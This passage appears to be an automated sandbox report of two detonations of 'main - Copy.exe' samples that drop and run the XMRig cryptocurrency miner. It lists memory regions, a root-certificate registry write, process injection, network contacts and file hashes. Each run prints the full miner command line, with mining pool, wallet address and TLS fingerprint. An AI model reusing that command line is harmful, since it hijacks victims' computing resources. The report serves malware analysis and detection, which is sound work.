memory/4492-20-0x000001FA81710000-0x000001FA81730000-memory.dmp
memory/4492-21-0x000001FA81730000-0x000001FA81750000-memory.dmp
memory/4492-22-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-23-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-24-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-25-0x000001FA81710000-0x000001FA81730000-memory.dmp
memory/4492-26-0x000001FA81730000-0x000001FA81750000-memory.dmp
memory/4492-27-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-28-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-29-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-30-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-31-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-32-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-33-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-34-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-35-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-36-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-37-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-38-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-39-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-40-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-41-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-42-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-43-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-44-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-45-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-46-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-47-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-48-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-49-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-50-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-51-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-52-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-53-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-54-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-55-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-56-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-57-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-58-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-59-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-60-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-61-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-62-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-63-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-64-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-65-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-66-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-67-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-68-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-69-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-70-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-71-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-72-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-73-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-74-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-75-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-76-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-77-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-78-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-79-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-80-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-81-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-82-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-83-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-84-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:38
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4280 wrote to memory of 1576 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4280 wrote to memory of 1576 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1576-16-0x000001541D200000-0x000001541D220000-memory.dmp
memory/1576-17-0x000001541D250000-0x000001541D270000-memory.dmp
memory/1576-18-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-20-0x000001541EB50000-0x000001541EB70000-memory.dmp
memory/1576-19-0x000001541EB30000-0x000001541EB50000-memory.dmp
memory/1576-21-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-22-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-24-0x000001541EB30000-0x000001541EB50000-memory.dmp
memory/1576-25-0x000001541EB50000-0x000001541EB70000-memory.dmp
memory/1576-23-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-26-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-27-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-28-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-29-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-30-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-31-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-32-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-33-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-34-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-35-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-36-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-37-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-38-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-39-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-40-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-41-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-42-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-43-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-44-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-45-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-46-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-47-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-48-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-49-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-50-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-51-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-52-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-53-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-54-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-55-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-56-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-57-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-58-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-59-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-60-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-61-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-62-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-63-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-64-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-65-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-66-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-67-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-68-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-69-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-70-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-71-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-72-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-73-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-74-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-75-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-76-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-77-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-78-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-79-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-80-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-81-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-82-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-83-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-84-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:38
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3256 wrote to memory of 5080 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3256 wrote to memory of 5080 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
